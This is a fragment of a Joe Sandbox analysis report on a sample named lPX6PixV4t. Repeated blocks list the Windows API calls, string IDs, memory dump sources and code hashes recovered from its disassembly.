                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$Directory$CurrentSystem
                          • String ID: D
                          • API String ID: 1914653954-2746444292
                          • Opcode ID: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                          • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                          • Opcode Fuzzy Hash: 0d94b415f8f4be32da9437a4562fd2ea9250d6af123b13f45aceadf0defadff8
                          • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                          APIs
                          • _wcsncpy.LIBCMT ref: 0045CE39
                          • __wsplitpath.LIBCMT ref: 0045CE78
                          • _wcscat.LIBCMT ref: 0045CE8B
                          • _wcscat.LIBCMT ref: 0045CE9E
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                          • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                          • _wcscpy.LIBCMT ref: 0045CF61
                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                          • String ID: *.*
                          • API String ID: 1153243558-438819550
                          • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                          • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                          • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                          • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: __wcsicoll
                          • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                          • API String ID: 3832890014-4202584635
                          • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                          • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                          • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                          • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                          APIs
                          • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                          • GetFocus.USER32 ref: 0046A0DD
                          • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessagePost$CtrlFocus
                          • String ID: 0
                          • API String ID: 1534620443-4108050209
                          • Opcode ID: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                          • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                          • Opcode Fuzzy Hash: 5cb98421042f455ec4000b61dd51e58b9a21b7b09c176f3470d706b88b7d88ce
                          • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                          APIs
                          • DestroyWindow.USER32(?), ref: 004558E3
                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$CreateDestroy
                          • String ID: ,$tooltips_class32
                          • API String ID: 1109047481-3856767331
                          • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                          • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                          • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                          • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                          APIs
                          • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                          • GetMenuItemCount.USER32(?), ref: 00468C45
                          • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                          • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                          • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                          • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                          • GetMenuItemCount.USER32 ref: 00468CFD
                          • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                          • GetCursorPos.USER32(?), ref: 00468D3F
                          • SetForegroundWindow.USER32(?), ref: 00468D49
                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                          • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                          • String ID: 0
                          • API String ID: 1441871840-4108050209
                          • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                          • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                          • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                          • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                          • __swprintf.LIBCMT ref: 00460915
                          • __swprintf.LIBCMT ref: 0046092D
                          • _wprintf.LIBCMT ref: 004609E1
                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                          • API String ID: 3631882475-2268648507
                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                          APIs
                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                          • SendMessageW.USER32 ref: 00471740
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                          • SendMessageW.USER32 ref: 0047184F
                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                          • String ID:
                          • API String ID: 4116747274-0
                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                          APIs
                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                          • _wcslen.LIBCMT ref: 00461683
                          • __swprintf.LIBCMT ref: 00461721
                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                          • GetDlgCtrlID.USER32(?), ref: 00461869
                          • GetWindowRect.USER32(?,?), ref: 004618A4
                          • GetParent.USER32(?), ref: 004618C3
                          • ScreenToClient.USER32(00000000), ref: 004618CA
                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                          • String ID: %s%u
                          • API String ID: 1899580136-679674701
                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                          APIs
                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: InfoItemMenu$Sleep
                          • String ID: 0
                          • API String ID: 1196289194-4108050209
                          • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                          • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                          APIs
                          • GetDC.USER32(00000000), ref: 0043143E
                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                          • SelectObject.GDI32(00000000,?), ref: 00431466
                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                          • String ID: (
                          • API String ID: 3300687185-3887548279
                          • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                          • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                          APIs
                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                          • API String ID: 1976180769-4113822522
                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                          • String ID:
                          • API String ID: 461458858-0
                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                          • DeleteObject.GDI32(?), ref: 004301D0
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
